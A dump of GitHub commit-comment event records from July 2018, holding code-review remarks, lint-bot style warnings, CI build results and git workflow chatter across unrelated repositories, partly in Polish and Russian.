{"id":"7990601201","type":"CommitCommentEvent","actor":{"login":"joshuazhu17"},"repo":{"name":"calee14/MeetUp"},"payload":{"comment":{"id":29768040,"position":null,"line":null,"path":null,"commit_id":"f5953f1e575d5d2bad1d6ee9ec442c6bd69eb000","created_at":"2018-07-19T17:33:16Z","updated_at":"2018-07-19T17:33:16Z","author_association":"COLLABORATOR","body":"Forgot to put a -1 in the CalculateTime algorithm"}},"created_at":"2018-07-19T17:33:16Z"}
{"id":"7990608219","type":"CommitCommentEvent","actor":{"login":"atherdon"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29768048,"position":null,"line":null,"path":null,"commit_id":"bc02e81f9d5e2757ce4c092e386eb31f4e2f4a46","created_at":"2018-07-19T17:34:44Z","updated_at":"2018-07-19T17:34:44Z","author_association":"MEMBER","body":"yeah, i'm tried to break your workflow, so you can lean git more :0\r\ndo you think you can figure it out how to do in git style way? i mean maybe this will help you in the future..."}},"created_at":"2018-07-19T17:34:44Z"}
{"id":"7990608282","type":"CommitCommentEvent","actor":{"login":"arikrupnik"},"repo":{"name":"arikrupnik/the-heir"},"payload":{"comment":{"id":29768049,"position":null,"line":null,"path":null,"commit_id":"f786cfe62961390a1d417f4c82d9530c17635552","created_at":"2018-07-19T17:34:45Z","updated_at":"2018-07-19T17:34:45Z","author_association":"OWNER","body":"Thank you! If you have more edits to make, go ahead and add more commits in this branch. If you're complete on your edits, click \"Create Pull Request\" so we can merge your changes and make them available in the `master` branch.\r\n\r\nAlso, I notice that you forked the repository and made your own copy of it (https://github.com/VictoriaValentine/the-heir). You probably want to delete that and keep all your edits here. Forking is useful when you want to propose changes to repositories where you have no write access. SInce you already like and trust you, and have made you a collaborator in this repository, forking is unnecessary."}},"created_at":"2018-07-19T17:34:45Z"}
{"id":"7990609982","type":"CommitCommentEvent","actor":{"login":"cindyloo"},"repo":{"name":"mitmedialab/MediaCloud-Web-Tools"},"payload":{"comment":{"id":29768054,"position":null,"line":null,"path":null,"commit_id":"0486200b7bbcc22dcd8eb559592be22744914c7d","created_at":"2018-07-19T17:35:06Z","updated_at":"2018-07-19T17:35:06Z","author_association":"COLLABORATOR","body":"ignore/revert the package-lock.json file. got in there by accident."}},"created_at":"2018-07-19T17:35:06Z"}
{"id":"7990611498","type":"CommitCommentEvent","actor":{"login":"TylerJensen1107"},"repo":{"name":"alfinoc/leds"},"payload":{"comment":{"id":29768060,"position":37,"line":37,"path":"server/static/grid.html","commit_id":"a71f0f7a82092262888bfaaf03b4bdc9d942a372","created_at":"2018-07-19T17:35:25Z","updated_at":"2018-07-19T17:35:25Z","author_association":"NONE","body":"nit : break this out into a seperate CSS file"}},"created_at":"2018-07-19T17:35:25Z"}
{"id":"7990615755","type":"CommitCommentEvent","actor":{"login":"jrchamp"},"repo":{"name":"PHPCompatibility/PHPCompatibility"},"payload":{"comment":{"id":29768066,"position":null,"line":null,"path":null,"commit_id":"eba7501e48209d933ddb930f08830529fe6931a5","created_at":"2018-07-19T17:36:18Z","updated_at":"2018-07-19T17:36:18Z","author_association":"NONE","body":"Here's the commit that added the mode parameter (Mar 29, 2002): https://github.com/php/php-src/commit/7f89d8c13a7c4d86a4efb8b15609533bf2928d9e#diff-2d6774c090d2612dfd3cd2f0feb2f6e1R631"}},"created_at":"2018-07-19T17:36:18Z"}
{"id":"7990616360","type":"CommitCommentEvent","actor":{"login":"grayed"},"repo":{"name":"chubin/cheat.sh"},"payload":{"comment":{"id":29768070,"position":null,"line":null,"path":null,"commit_id":"ada92527301e63e412c67530ae20822adb4aa561","created_at":"2018-07-19T17:36:25Z","updated_at":"2018-07-19T17:36:25Z","author_association":"NONE","body":"Yes. Does it hurt?"}},"created_at":"2018-07-19T17:36:25Z"}
{"id":"7990618638","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"russHyde/polyply"},"payload":{"comment":{"id":29768076,"position":null,"line":null,"path":null,"commit_id":"89451a2a2ebed7285d25e31a90f2b1b20fcb34aa","created_at":"2018-07-19T17:36:53Z","updated_at":"2018-07-19T17:36:53Z","author_association":"NONE","body":"[tests/testthat/test_polyply_data_validity.R:9:5:](https://github.com/russHyde/polyply/blob/89451a2a2ebed7285d25e31a90f2b1b20fcb34aa/tests/testthat/test_polyply_data_validity.R#L9) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:13:5:](https://github.com/russHyde/polyply/blob/89451a2a2ebed7285d25e31a90f2b1b20fcb34aa/tests/testthat/test_polyply_data_validity.R#L13) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(list()),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:17:5:](https://github.com/russHyde/polyply/blob/89451a2a2ebed7285d25e31a90f2b1b20fcb34aa/tests/testthat/test_polyply_data_validity.R#L17) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\"Not a list\"),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:21:5:](https://github.com/russHyde/polyply/blob/89451a2a2ebed7285d25e31a90f2b1b20fcb34aa/tests/testthat/test_polyply_data_validity.R#L21) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(list(\"Not a data-frame\")),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:25:5:](https://github.com/russHyde/polyply/blob/89451a2a2ebed7285d25e31a90f2b1b20fcb34aa/tests/testthat/test_polyply_data_validity.R#L25) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:31:5:](https://github.com/russHyde/polyply/blob/89451a2a2ebed7285d25e31a90f2b1b20fcb34aa/tests/testthat/test_polyply_data_validity.R#L31) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:37:5:](https://github.com/russHyde/polyply/blob/89451a2a2ebed7285d25e31a90f2b1b20fcb34aa/tests/testthat/test_polyply_data_validity.R#L37) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:43:5:](https://github.com/russHyde/polyply/blob/89451a2a2ebed7285d25e31a90f2b1b20fcb34aa/tests/testthat/test_polyply_data_validity.R#L43) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:50:7:](https://github.com/russHyde/polyply/blob/89451a2a2ebed7285d25e31a90f2b1b20fcb34aa/tests/testthat/test_polyply_data_validity.R#L50) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​      .is_nonempty_list_of_data_frames(\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T17:36:53Z"}
{"id":"7990620051","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"chmi3ll/agata-chmielewska-project"},"payload":{"comment":{"id":29768079,"position":29,"line":29,"path":"src/main/java/com/crud/tasks/scheduler/EmalScheduler.java","commit_id":"94d42d403a920bde31a1786ac39ed04c7af61e04","created_at":"2018-07-19T17:37:10Z","updated_at":"2018-07-19T17:37:10Z","author_association":"NONE","body":"Jest taka zasada, poznałaś ją w module 9: DRY - don't repeat yourself.\nCzy teraz powtarzasz kod? Możesz tego uniknąć\n\nczw., 19 lip 2018 o 19:25 chmi3ll <notifications@github.com> napisał(a):\n\n> przeciez dodatkowa zmienna wiele nie zdziała skoro ten podobny kod to\n> zlozenie metody, obiektu i kilku jego parametrow.. musze ja podstawic tylko\n> za fragment\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/chmi3ll/agata-chmielewska-project/commit/94d42d403a920bde31a1786ac39ed04c7af61e04#commitcomment-29767957>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJ9KJ48sShrd84NNQQUvIXE74WWny9hdks5uIMEJgaJpZM4VRq4j>\n> .\n>\n"}},"created_at":"2018-07-19T17:37:10Z"}
{"id":"7990620944","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/saymore"},"payload":{"comment":{"id":29768080,"position":null,"line":null,"path":null,"commit_id":"0a4faf6fd1a0c46baa800dea937ced2da14e97df","created_at":"2018-07-19T17:37:22Z","updated_at":"2018-07-19T17:37:22Z","author_association":"NONE","body":"TeamCity SayMore :: SayMore pull requests [Build *.*.201.0a4faf6fd1a0c46baa800dea937ced2da14e97df](http://build.palaso.org/viewLog.html?buildId=125147&buildTypeId=SayMore_SayMorePullRequests) outcome was **FAILURE**\nSummary: Failed to resolve artifact dependency Build time: 00:00:11"}},"created_at":"2018-07-19T17:37:22Z"}
{"id":"7990622892","type":"CommitCommentEvent","actor":{"login":"grayed"},"repo":{"name":"chubin/cheat.sh"},"payload":{"comment":{"id":29768091,"position":null,"line":null,"path":null,"commit_id":"ada92527301e63e412c67530ae20822adb4aa561","created_at":"2018-07-19T17:37:46Z","updated_at":"2018-07-19T17:37:46Z","author_association":"NONE","body":"BTW, POSIX mandates ls -l behavior, when it should be \"Mon Day HH:MM\", and when it should be \"Mon Day Year\"."}},"created_at":"2018-07-19T17:37:46Z"}
{"id":"7990623718","type":"CommitCommentEvent","actor":{"login":"stephensj2"},"repo":{"name":"ml4ai/delphi"},"payload":{"comment":{"id":29768094,"position":null,"line":null,"path":null,"commit_id":"0afa50c0e9e70b51c8961e169f02d6aed759837f","created_at":"2018-07-19T17:37:57Z","updated_at":"2018-07-19T17:37:57Z","author_association":"NONE","body":"Which file were you trying to change the indentation of? This should indeed change the indentation of the intermediate file. If you are trying to change the indentation of the lambda functions file though, a similar change needs to be made in genCode.py."}},"created_at":"2018-07-19T17:37:57Z"}
{"id":"7990625248","type":"CommitCommentEvent","actor":{"login":"alifr"},"repo":{"name":"NCIOCPL/wcms-front-end"},"payload":{"comment":{"id":29768098,"position":4,"line":326,"path":"CancerGov/_src/StyleSheets/_homelanding.scss","commit_id":"6728d3f492ba2915d5ffb352d406a957be6fa95e","created_at":"2018-07-19T17:38:18Z","updated_at":"2018-07-19T17:38:18Z","author_association":"MEMBER","body":"Nope, this is not going to work. We already touched on this. This will create the problem of pushing the child out of the parent (card) element, especially when the H2 wraps."}},"created_at":"2018-07-19T17:38:18Z"}
{"id":"7990627481","type":"CommitCommentEvent","actor":{"login":"Glutexo"},"repo":{"name":"pyvec/pyvo-data"},"payload":{"comment":{"id":29768104,"position":1,"line":1,"path":"cities/liskovec/city.yaml","commit_id":"cadb898c6a656ca0aad3a6c5895ee89ca53efd85","created_at":"2018-07-19T17:38:47Z","updated_at":"2018-07-19T17:38:47Z","author_association":"NONE","body":"Lískovec není obec. (Narozdíl od Starého Města. 😄) Od roku 1979 je to součást Frýdku-Místku."}},"created_at":"2018-07-19T17:38:47Z"}
{"id":"7990632702","type":"CommitCommentEvent","actor":{"login":"TylerJensen1107"},"repo":{"name":"alfinoc/dad_site"},"payload":{"comment":{"id":29768116,"position":5,"line":5,"path":"back/anonymize.py","commit_id":"0eb5bf4bad48187767a64d023a53a4092c097e52","created_at":"2018-07-19T17:39:52Z","updated_at":"2018-07-19T17:39:52Z","author_association":"NONE","body":"A+ dataset gonna need the source for this"}},"created_at":"2018-07-19T17:39:52Z"}
{"id":"7990635892","type":"CommitCommentEvent","actor":{"login":"atherdon"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29768123,"position":null,"line":null,"path":null,"commit_id":"bc02e81f9d5e2757ce4c092e386eb31f4e2f4a46","created_at":"2018-07-19T17:40:33Z","updated_at":"2018-07-19T17:40:33Z","author_association":"MEMBER","body":"what i did i just googled: https://stackoverflow.com/questions/25411366/git-repo-says-its-up-to-date-after-pull-but-files-are-not-updated"}},"created_at":"2018-07-19T17:40:33Z"}
{"id":"7990638395","type":"CommitCommentEvent","actor":{"login":"chmi3ll"},"repo":{"name":"chmi3ll/agata-chmielewska-project"},"payload":{"comment":{"id":29768129,"position":29,"line":29,"path":"src/main/java/com/crud/tasks/scheduler/EmalScheduler.java","commit_id":"94d42d403a920bde31a1786ac39ed04c7af61e04","created_at":"2018-07-19T17:41:03Z","updated_at":"2018-07-19T17:41:03Z","author_association":"OWNER","body":"znam zasade ale nie mam jak tego ladnie ominac..\r\npodstawic za:\r\na) simpleMailService.send\r\nb) adminConfig.getAdminMail(), SUBJECT, \"Currently in database you got: \" + size + \r\nc) za email\r\n?"}},"created_at":"2018-07-19T17:41:03Z"}
{"id":"7990641844","type":"CommitCommentEvent","actor":{"login":"atherdon"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29768138,"position":null,"line":null,"path":null,"commit_id":"bc02e81f9d5e2757ce4c092e386eb31f4e2f4a46","created_at":"2018-07-19T17:41:46Z","updated_at":"2018-07-19T17:41:46Z","author_association":"MEMBER","body":"not sure if it helps with your situation, but just understading that this can be solved easily - at least make it easier to feel :)\r\n"}},"created_at":"2018-07-19T17:41:46Z"}
{"id":"7990642205","type":"CommitCommentEvent","actor":{"login":"specing"},"repo":{"name":"springlobby/springlobby"},"payload":{"comment":{"id":29768139,"position":14,"line":138,"path":"src/spring.cpp","commit_id":"483750ac6bbe00c562b4300520042cd22dcb70b9","created_at":"2018-07-19T17:41:50Z","updated_at":"2018-07-19T17:41:50Z","author_association":"CONTRIBUTOR","body":"at least use a reference."}},"created_at":"2018-07-19T17:41:50Z"}
{"id":"7990650099","type":"CommitCommentEvent","actor":{"login":"koirikivi"},"repo":{"name":"TokenMarketNet/ico"},"payload":{"comment":{"id":29768160,"position":7,"line":200,"path":"contracts/TokenVault.sol","commit_id":"e5fb0a08557e46e22f8cdf5b4d0fa09afc531883","created_at":"2018-07-19T17:43:27Z","updated_at":"2018-07-19T17:43:27Z","author_association":"NONE","body":"I don't really know solidity. But would it save gas to put the\r\n```uint sinceLastClaim = lastClaimed[investor];\r\nuint maxClaim;```\r\nhere?"}},"created_at":"2018-07-19T17:43:27Z"}
{"id":"7990655453","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson2"},"payload":{"comment":{"id":29768174,"position":8,"line":8,"path":"array.rb","commit_id":"922dde2713b047f07dbeda6bda4afeff1525edf2","created_at":"2018-07-19T17:44:31Z","updated_at":"2018-07-19T17:44:31Z","author_association":"NONE","body":"верно, лови для ознакомления короткие варианты\r\nМожно чуть короче\r\n`(10..100).step(5).to_a`\r\nили \r\n`(2..20).map{|x| x * 5}`"}},"created_at":"2018-07-19T17:44:31Z"}
{"id":"7990656944","type":"CommitCommentEvent","actor":{"login":"espritka"},"repo":{"name":"espritka/project-memory"},"payload":{"comment":{"id":29768179,"position":null,"line":null,"path":null,"commit_id":"c9cb82191a92130bd6665df56e264e804623489a","created_at":"2018-07-19T17:44:48Z","updated_at":"2018-07-19T17:44:48Z","author_association":"OWNER","body":"Finally, I found how to stop adding more than 2 cards to an array of open cards. The solution seems simple, but took me few ours to finally get it understand. "}},"created_at":"2018-07-19T17:44:48Z"}
{"id":"7990658559","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29768183,"position":null,"line":null,"path":null,"commit_id":"55777e3ff6b0484fcd23659b0a29262bd0e87d44","created_at":"2018-07-19T17:45:06Z","updated_at":"2018-07-19T17:45:06Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2985 of 2988 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 657\n * Failed: 1\n\nregression Test Summary\n * Passed: 641\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-19T17:45:06Z"}
{"id":"7990658718","type":"CommitCommentEvent","actor":{"login":"CircleXing001"},"repo":{"name":"CircleXing001/DL-tools"},"payload":{"comment":{"id":29768184,"position":null,"line":null,"path":null,"commit_id":"c837f02827d7bc3c196170e06f3618b0db227d02","created_at":"2018-07-19T17:45:08Z","updated_at":"2018-07-19T17:45:08Z","author_association":"OWNER","body":"Processed data"}},"created_at":"2018-07-19T17:45:08Z"}
{"id":"7990660201","type":"CommitCommentEvent","actor":{"login":"CircleXing001"},"repo":{"name":"CircleXing001/DL-tools"},"payload":{"comment":{"id":29768195,"position":null,"line":null,"path":null,"commit_id":"c837f02827d7bc3c196170e06f3618b0db227d02","created_at":"2018-07-19T17:45:24Z","updated_at":"2018-07-19T17:45:24Z","author_association":"OWNER","body":"Processed data"}},"created_at":"2018-07-19T17:45:24Z"}
{"id":"7990661450","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"chmi3ll/agata-chmielewska-project"},"payload":{"comment":{"id":29768198,"position":29,"line":29,"path":"src/main/java/com/crud/tasks/scheduler/EmalScheduler.java","commit_id":"94d42d403a920bde31a1786ac39ed04c7af61e04","created_at":"2018-07-19T17:45:39Z","updated_at":"2018-07-19T17:45:39Z","author_association":"NONE","body":"Jedynym fragmentem jaki się zmienia jest size i task lub tasks. Można te dwie zmienne złączyć.\r\nString text = \"\" + size + \" tasks\";\r\n`if (size == 1 {\r\n    text = \"1 task\";\r\n}`\r\nPod ifem możesz wywołać metodę send z simpleMailService przekazując text zamiast size i task/tasks"}},"created_at":"2018-07-19T17:45:39Z"}
{"id":"7990663675","type":"CommitCommentEvent","actor":{"login":"AlexHaxe"},"repo":{"name":"HaxeCheckstyle/tokentree-formatter"},"payload":{"comment":{"id":29768207,"position":19,"line":19,"path":"test/testcases/sameline/if_after_assign_with_blocks_issue_42.hxtest","commit_id":"e15103a5188f61cf52b7189cca0d4c3d372e5bc7","created_at":"2018-07-19T17:46:07Z","updated_at":"2018-07-19T17:46:07Z","author_association":"MEMBER","body":"now it's an option"}},"created_at":"2018-07-19T17:46:07Z"}
{"id":"7990665300","type":"CommitCommentEvent","actor":{"login":"sanchit94"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29768212,"position":null,"line":null,"path":null,"commit_id":"bc02e81f9d5e2757ce4c092e386eb31f4e2f4a46","created_at":"2018-07-19T17:46:25Z","updated_at":"2018-07-19T17:46:25Z","author_association":"COLLABORATOR","body":"Hehe... I got a workaround, just clone the repo again... But there would be\na better way to do this.\n\nOn Thu 19 Jul, 2018, 11:11 PM Arthur Tkachenko, <notifications@github.com>\nwrote:\n\n> not sure if it helps with your situation, but just understading that this\n> can be solved easily - at least make it easier to feel :)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/GroceriStar/react-only-intern-23/commit/bc02e81f9d5e2757ce4c092e386eb31f4e2f4a46#commitcomment-29768138>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Af_sDOjEQ7UAVa2oIg-K27d6248y7Dllks5uIMTbgaJpZM4VWk4P>\n> .\n>\n"}},"created_at":"2018-07-19T17:46:25Z"}
{"id":"7990669505","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29768223,"position":11,"line":11,"path":"tn_01/quadratic_equation.rb","commit_id":"142f1fed52466c2ff459dd878008bd33de32a405","created_at":"2018-07-19T17:47:17Z","updated_at":"2018-07-19T17:47:17Z","author_association":"NONE","body":"Можно не использовать chomp перед методами to_i/to_f. Эти методы отбрасывают символ новой строки автоматический."}},"created_at":"2018-07-19T17:47:17Z"}
{"id":"7990676916","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29768242,"position":27,"line":27,"path":"tn_01/quadratic_equation.rb","commit_id":"142f1fed52466c2ff459dd878008bd33de32a405","created_at":"2018-07-19T17:48:48Z","updated_at":"2018-07-19T17:48:48Z","author_association":"NONE","body":"Тут стоит вынести вычисление квадратного корня в отдельную переменную. В случае более сложных вычислений, это позволит посчитать 1 раз, а использовать несколько. Экономия ресурсов."}},"created_at":"2018-07-19T17:48:48Z"}
{"id":"7990681567","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/tokentree-formatter"},"payload":{"comment":{"id":29768247,"position":19,"line":19,"path":"test/testcases/sameline/if_after_assign_with_blocks_issue_42.hxtest","commit_id":"e15103a5188f61cf52b7189cca0d4c3d372e5bc7","created_at":"2018-07-19T17:49:43Z","updated_at":"2018-07-19T17:49:43Z","author_association":"MEMBER","body":"Awesome, thanks! 👍 "}},"created_at":"2018-07-19T17:49:43Z"}
{"id":"7990682066","type":"CommitCommentEvent","actor":{"login":"grant2258"},"repo":{"name":"libretro/mame2003-plus-libretro"},"payload":{"comment":{"id":29768249,"position":null,"line":null,"path":null,"commit_id":"1126c56649ff822818f1640b6da7493bae17deb8","created_at":"2018-07-19T17:49:50Z","updated_at":"2018-07-19T17:49:50Z","author_association":"CONTRIBUTOR","body":"this never errored on gnu90 was just a warning sorry about that"}},"created_at":"2018-07-19T17:49:50Z"}
{"id":"7990682809","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29768253,"position":null,"line":null,"path":null,"commit_id":"55777e3ff6b0484fcd23659b0a29262bd0e87d44","created_at":"2018-07-19T17:49:59Z","updated_at":"2018-07-19T17:49:59Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T17:49:59Z"}
{"id":"7990683399","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson2"},"payload":{"comment":{"id":29768254,"position":3,"line":3,"path":"magazin.rb","commit_id":"922dde2713b047f07dbeda6bda4afeff1525edf2","created_at":"2018-07-19T17:50:07Z","updated_at":"2018-07-19T17:50:07Z","author_association":"NONE","body":"странная штука. тут price_count - массив, ниже ты его приравниваешь hash, но название говорит, что это вообще должно быть число "}},"created_at":"2018-07-19T17:50:07Z"}
{"id":"7990685453","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29768260,"position":18,"line":18,"path":"tn_01/right_triangle.rb","commit_id":"37de0325c28939bccb566f58130eed82358e5634","created_at":"2018-07-19T17:50:31Z","updated_at":"2018-07-19T17:50:31Z","author_association":"NONE","body":"Про chomp писал."}},"created_at":"2018-07-19T17:50:31Z"}
{"id":"7990689530","type":"CommitCommentEvent","actor":{"login":"roji"},"repo":{"name":"FlorianRainer/npgsql"},"payload":{"comment":{"id":29768270,"position":null,"line":null,"path":null,"commit_id":"52cb4aba451fa19b5520e1544e4c5de22866ac72","created_at":"2018-07-19T17:51:21Z","updated_at":"2018-07-19T17:51:21Z","author_association":"NONE","body":"Well, @YohDeadfall mentioned me in this commit so here I am :)"}},"created_at":"2018-07-19T17:51:21Z"}
{"id":"7990690300","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29768284,"position":null,"line":null,"path":null,"commit_id":"727f6ba8cc5e6d29b2995dbd9764294e6944679e","created_at":"2018-07-19T17:51:30Z","updated_at":"2018-07-19T17:51:30Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create Markdown support in notes](https://trello.com/c/JXg7x93o/10-create-markdown-support-in-notes)"}},"created_at":"2018-07-19T17:51:30Z"}
{"id":"7990691545","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29768289,"position":null,"line":null,"path":null,"commit_id":"a072376738ce434c995d6104e6f175d5144ff4ff","created_at":"2018-07-19T17:51:46Z","updated_at":"2018-07-19T17:51:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create Markdown support in notes](https://trello.com/c/JXg7x93o/10-create-markdown-support-in-notes)"}},"created_at":"2018-07-19T17:51:46Z"}
{"id":"7990691568","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29768290,"position":null,"line":null,"path":null,"commit_id":"51e5f35e8811e68a73b5e925ea1c5b48bf946de6","created_at":"2018-07-19T17:51:46Z","updated_at":"2018-07-19T17:51:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create Markdown support in notes](https://trello.com/c/JXg7x93o/10-create-markdown-support-in-notes)"}},"created_at":"2018-07-19T17:51:46Z"}
{"id":"7990695433","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson2"},"payload":{"comment":{"id":29768301,"position":43,"line":43,"path":"magazin.rb","commit_id":"922dde2713b047f07dbeda6bda4afeff1525edf2","created_at":"2018-07-19T17:52:33Z","updated_at":"2018-07-19T17:52:33Z","author_association":"NONE","body":"сделай корзину вида\r\n{\r\n  \"молоко\" => {count: 1, price: 10}, \r\n  \"хлеб\" => {count: 2, price: 35}\r\n}\r\n\r\nНе забывай про отступы в loop\r\n\r\nНу и вообще не понятно что это\r\nshop.push(name)\r\nshop.push(price_count={count =>price})\r\nу нас корзина покупок должна быть Hash, а не массив"}},"created_at":"2018-07-19T17:52:33Z"}
{"id":"7990695973","type":"CommitCommentEvent","actor":{"login":"Benau"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29768303,"position":null,"line":null,"path":null,"commit_id":"c4ae3dff694535a78fc93c3320c83bd7e757d6c6","created_at":"2018-07-19T17:52:40Z","updated_at":"2018-07-19T17:52:40Z","author_association":"MEMBER","body":"@deveee have time to update android beta apk + your server too?\r\n\r\n(and is the \"werid\" game screenshot reproducible?)"}},"created_at":"2018-07-19T17:52:40Z"}
{"id":"7990696254","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"russHyde/polyply"},"payload":{"comment":{"id":29768305,"position":null,"line":null,"path":null,"commit_id":"29426a0701c67a611300050b33b85219fd00b60a","created_at":"2018-07-19T17:52:43Z","updated_at":"2018-07-19T17:52:43Z","author_association":"NONE","body":"[R/polyply_data_validity.R:9:1:](https://github.com/russHyde/polyply/blob/29426a0701c67a611300050b33b85219fd00b60a/R/polyply_data_validity.R#L9) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​.is_nonempty_list_of_data_frames <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/polyply_poly_frame.R:41:5:](https://github.com/russHyde/polyply/blob/29426a0701c67a611300050b33b85219fd00b60a/R/polyply_poly_frame.R#L41) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(x) &&\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/polyply_poly_frame.R:72:3:](https://github.com/russHyde/polyply/blob/29426a0701c67a611300050b33b85219fd00b60a/R/polyply_poly_frame.R#L72) *style:* **Commented code should be removed.**\n```r\n​# accessors & setters\n  ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:9:5:](https://github.com/russHyde/polyply/blob/29426a0701c67a611300050b33b85219fd00b60a/tests/testthat/test_polyply_data_validity.R#L9) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:13:5:](https://github.com/russHyde/polyply/blob/29426a0701c67a611300050b33b85219fd00b60a/tests/testthat/test_polyply_data_validity.R#L13) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(list()),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:17:5:](https://github.com/russHyde/polyply/blob/29426a0701c67a611300050b33b85219fd00b60a/tests/testthat/test_polyply_data_validity.R#L17) 